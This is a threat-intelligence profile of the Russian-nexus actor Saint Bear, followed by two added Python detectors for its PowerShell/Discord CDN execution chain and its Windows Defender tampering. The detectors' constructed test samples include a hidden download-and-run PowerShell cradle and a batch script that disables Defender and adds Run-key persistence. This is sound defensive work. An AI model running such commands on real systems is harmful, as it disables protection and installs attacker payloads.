Saint Bear is a Russian-nexus threat actor active since early 2021, primarily targeting entities in Ukraine and Georgia. The group is notable for its use of a specific remote access tool, Saint Bot, and an information stealer, OutSteel, in its campaigns. Saint Bear typically relies on phishing or web staging of malicious documents and related file types for initial access, spoofing government or related entities.[1][2] Saint Bear has previously been conflated with Ember Bear operations, but analysis of behaviors, tools, and targeting indicates these are distinct clusters.
| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1583.006 | Acquire Infrastructure: Web Services | Saint Bear has leveraged the Discord content delivery network to host malicious content for retrieval during initial access operations.[1] |
| Enterprise | T1059 | Command and Scripting Interpreter | Saint Bear has used the Windows Script Host (wscript) to execute intermediate files written to victim machines.[1] |
| Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | Saint Bear relies extensively on PowerShell execution from malicious attachments and related content to retrieve and execute follow-on payloads.[1] |
| Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Saint Bear initial loaders also drop a malicious Windows batch file, available from open source GitHub repositories, that disables Microsoft Defender functionality.[1] |
| Enterprise | T1059.007 | Command and Scripting Interpreter: JavaScript | Saint Bear has delivered malicious Microsoft Office files containing an embedded JavaScript object that, on execution, downloads and executes OutSteel and Saint Bot.[1] |
| Enterprise | T1203 | Exploitation for Client Execution | Saint Bear has leveraged vulnerabilities in client applications, such as CVE-2017-11882 in Microsoft Office, to enable code execution in victim environments.[1] |
| Enterprise | T1589.002 | Gather Victim Identity Information: Email Addresses | Saint Bear gathered victim email information in advance of phishing operations for targeted attacks.[1] |
| Enterprise | T1562.001 | Impair Defenses: Disable or Modify Tools | Saint Bear modifies registry entries and scheduled task objects associated with Windows Defender to disable its functionality.[1] |
| Enterprise | T1656 | Impersonation | Saint Bear has impersonated government and related entities both in phishing activity and in developing web sites with malicious links that mimic legitimate resources.[2] |
| Enterprise | T1112 | Modify Registry | Saint Bear leverages malicious Windows batch scripts to modify registry values associated with Windows Defender functionality.[1] |
| Enterprise | T1027.002 | Obfuscated Files or Information: Software Packing | Saint Bear clones .NET assemblies from other .NET binaries, as well as cloning code signing certificates from other software, to obfuscate the initial loader payload.[1] |
| Enterprise | T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File | Saint Bear initial payloads included encoded follow-on payloads stored in the resources of the first-stage loader.[1] |
| Enterprise | T1566.001 | Phishing: Spearphishing Attachment | Saint Bear uses a variety of file formats, such as Microsoft Office documents, ZIP archives, PDF documents, and other file types, as phishing attachments for initial access.[1] |
| Enterprise | T1608.001 | Stage Capabilities: Upload Malware | Saint Bear has used the Discord content delivery network to host malicious content referenced in links and emails.[1] |
| Enterprise | T1553.002 | Subvert Trust Controls: Code Signing | Saint Bear has used an initial loader featuring a legitimate code signing certificate associated with "Electrum Technologies GmbH."[1] |
| Enterprise | T1204.001 | User Execution: Malicious Link | In addition to email-based phishing attachments, Saint Bear has used malicious websites masquerading as legitimate entities to host links to malicious files for user execution.[1][2] |
| Enterprise | T1204.002 | User Execution: Malicious File | Saint Bear relies on user interaction with, and execution of, malicious attachments and similar files for initial execution on victim systems.[1] |
| Enterprise | T1497 | Virtualization/Sandbox Evasion | Saint Bear malware contains several anti-analysis and anti-virtualization checks.[1] |
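The execution rows above (T1059 Windows Script Host, T1059.001 PowerShell, T1203/T1204 document-driven execution) and the two Discord CDN rows (T1583.006, T1608.001) describe one chain: a document spawns a script host, which runs a PowerShell download cradle that fetches the next stage from the Discord CDN. The following triage logic is an added example written for this page, not Saint Bear tooling or ATT&CK content. It assumes Sysmon Event ID 1 field names (`Image`, `ParentImage`, `CommandLine`, `ProcessId`), and the Discord CDN host list and every sample event are constructed for the illustration.

```python
"""Triage of process-creation telemetry for the execution chain in the table
above: an Office document spawning a script host (wscript, T1059), which runs
PowerShell (T1059.001) to fetch a payload from the Discord CDN (T1583.006 /
T1608.001).  Added illustration, not Saint Bear tooling or ATT&CK content.
Field names follow Sysmon Event ID 1; every sample event is constructed."""
import re
from urllib.parse import urlparse

# Office parents that should not be launching script interpreters directly.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters the table names: Windows Script Host, PowerShell, cmd.
INTERPRETERS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
# Discord CDN hosts (assumed list; extend from your own proxy telemetry).
DISCORD_CDN_HOSTS = {"cdn.discordapp.com", "media.discordapp.net"}
# PowerShell download-and-run primitives commonly seen in one-liners.
CRADLE_RE = re.compile(
    r"\b(Invoke-WebRequest|iwr|wget|curl|DownloadString|DownloadFile|Invoke-Expression|iex)\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
# A script host executing a file from a user-writable location is suspicious.
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(event):
    """Return the list of findings for one process-creation event (empty if benign)."""
    findings = []
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS and image in INTERPRETERS:
        findings.append(f"office_spawns_interpreter:{parent}->{image}")
    if image in {"wscript.exe", "cscript.exe"} and USER_WRITABLE_RE.search(cmdline):
        findings.append("script_host_runs_user_writable_file")
    if image in {"powershell.exe", "pwsh.exe"} and CRADLE_RE.search(cmdline):
        findings.append("powershell_download_cradle")
    for url in URL_RE.findall(cmdline):
        if (urlparse(url).hostname or "").lower() in DISCORD_CDN_HOSTS:
            findings.append(f"discord_cdn_url:{url}")
    return findings


def triage(events):
    """Map ProcessId -> findings for every event that produced at least one."""
    result = {}
    for ev in events:
        found = triage_event(ev)
        if found:
            result[ev["ProcessId"]] = found
    return result


# Constructed sample events (not real telemetry): Word -> wscript -> PowerShell,
# plus an unrelated, benign PowerShell launch from svchost.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"WINWORD.EXE" /n "C:\\Users\\u\\Downloads\\document.docx"'},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"wscript.exe //E:jscript C:\Users\u\AppData\Local\Temp\stage1.txt"},
    {"ProcessId": 4210, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell -nop -w hidden -c \"iwr https://cdn.discordapp.com/attachments/111/222/x.exe"
                    " -OutFile $env:TEMP\\x.exe; Start-Process $env:TEMP\\x.exe\""},
    {"ProcessId": 5001, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "powershell -NoProfile -File C:\\ProgramData\\inventory.ps1"},
]

if __name__ == "__main__":
    for pid, findings in triage(SAMPLE_EVENTS).items():
        print(pid, findings)
```

The parent/child rule is the high-confidence signal; the cradle and Discord rules each fire on legitimate administration occasionally and are better used to enrich an alert than to raise one on their own. Because the Discord CDN is legitimate shared infrastructure, blocking it outright is rarely an option, so matching on attachment URLs in script-interpreter command lines (rather than in browser traffic) keeps the rule targeted.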
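The T1059.003, T1562.001 and T1112 rows all describe the same action: a dropped batch script that rewrites Windows Defender registry policy values and disables or deletes Defender scheduled tasks. The detector below is an added example for this page, not Saint Bear's batch file or ATT&CK content. It applies one rule set to two sources, the lines of a batch script (static triage of the dropped file) and Sysmon Event ID 13 registry "value set" records (runtime telemetry). The registry paths and task folder are the documented Defender locations; the batch script and Sysmon records are constructed for the illustration.

```python
"""Detection of the Microsoft Defender tampering described for T1059.003,
T1562.001 and T1112: registry values that disable Defender components and
Defender scheduled tasks being disabled or deleted.  One rule set is applied to
two sources: the lines of a dropped batch script (static triage) and Sysmon
Event ID 13 registry 'value set' events (runtime telemetry).  Added example,
not Saint Bear's batch file nor ATT&CK content; all sample input is constructed."""
import re

# Defender policy/service values and the data that disables the component
# (documented locations, lower-cased for matching; extend as needed).
DEFENDER_TAMPER_VALUES = {
    r"hklm\software\policies\microsoft\windows defender\disableantispyware": {1},
    r"hklm\software\policies\microsoft\windows defender\disableantivirus": {1},
    r"hklm\software\policies\microsoft\windows defender\real-time protection\disablerealtimemonitoring": {1},
    r"hklm\software\policies\microsoft\windows defender\real-time protection\disablebehaviormonitoring": {1},
    r"hklm\software\policies\microsoft\windows defender\spynet\submitsamplesconsent": {2},
    r"hklm\system\currentcontrolset\services\windefend\start": {4},
}
DEFENDER_TASK_FOLDER = "microsoft\\windows\\windows defender\\"   # built-in Defender tasks
HIVE_ALIASES = {"hkey_local_machine": "hklm", "hkey_current_user": "hkcu"}
TOKEN_RE = re.compile(r'"[^"]*"|\S+')                        # quoted string or bare word
SYSMON_DWORD_RE = re.compile(r"DWORD \((0x[0-9a-fA-F]+)\)")  # Sysmon's Details rendering

def _norm_key(key):
    hive, _, rest = key.strip('"').lower().partition("\\")
    return HIVE_ALIASES.get(hive, hive) + "\\" + rest

def _coerce(raw):
    """reg.exe accepts decimal or 0x hex for REG_DWORD data; other data stays text."""
    if re.fullmatch(r"0x[0-9a-f]+", raw.lower()):
        return int(raw, 16)
    return int(raw) if raw.isdigit() else raw

def _arg(toks, low, flag):
    """Token following a command-line switch such as /v, or None if absent."""
    i = low.index(flag) if flag in low else -1
    return toks[i + 1] if 0 <= i < len(toks) - 1 else None

def check_registry_write(key, value_name, data):
    """Finding string if (key, value_name, data) matches a tamper rule, else None."""
    path = _norm_key(key) + "\\" + value_name.lower()
    bad = DEFENDER_TAMPER_VALUES.get(path)
    return f"defender_tamper_registry:{path}={data}" if bad and data in bad else None

def check_batch_line(line):
    """One batch line: 'reg add' against the registry rules, 'schtasks' against the task folder."""
    toks = [t.strip('"') for t in TOKEN_RE.findall(line)]
    low = [t.lower() for t in toks]
    if len(low) >= 3 and low[0] in ("reg", "reg.exe") and low[1] == "add":
        name, raw = _arg(toks, low, "/v"), _arg(toks, low, "/d")
        if name is None or raw is None:
            return None
        return check_registry_write(toks[2], name, _coerce(raw))
    if low and low[0] in ("schtasks", "schtasks.exe"):
        task = (_arg(toks, low, "/tn") or "").lower().lstrip("\\")
        if task.startswith(DEFENDER_TASK_FOLDER):
            if "/delete" in low:
                return f"defender_task_deleted:{task}"
            if "/change" in low and "/disable" in low:
                return f"defender_task_disabled:{task}"
    return None

def scan_batch(script_text):
    """All findings, in order, for the lines of a batch script."""
    return [f for f in map(check_batch_line, script_text.splitlines()) if f]

def scan_sysmon_registry_events(events):
    """All findings for Sysmon Event ID 13 dicts carrying TargetObject and Details."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        key, _, name = ev["TargetObject"].rpartition("\\")
        m = SYSMON_DWORD_RE.match(ev.get("Details", ""))
        found = check_registry_write(key, name, int(m.group(1), 16) if m else ev.get("Details"))
        if found:
            findings.append(found)
    return findings

# Constructed batch script in the style of public "disable Defender" scripts.
SAMPLE_BAT = r'''@echo off
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Users\Public\u.exe" /f
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Delete /TN "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /F
'''
# Constructed Sysmon Event ID 13 records: a tamper, a benign re-enable, a service disable.
SAMPLE_SYSMON = [
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring", "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring", "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\Start", "Details": "DWORD (0x00000004)"},
]

if __name__ == "__main__":
    for finding in scan_batch(SAMPLE_BAT) + scan_sysmon_registry_events(SAMPLE_SYSMON):
        print(finding)
```

Two caveats for deployment. Sysmon only emits Event ID 13 for keys its configuration includes, so the Defender policy tree and the WinDefend service key must be in the `RegistryEvent` rules for the runtime path to see anything. And where Tamper Protection is enabled, Windows ignores or reverts most of these policy writes, so a match from the batch path tells you what the script attempted, not necessarily what took effect; confirm the resulting state on the host before treating the machine as unprotected.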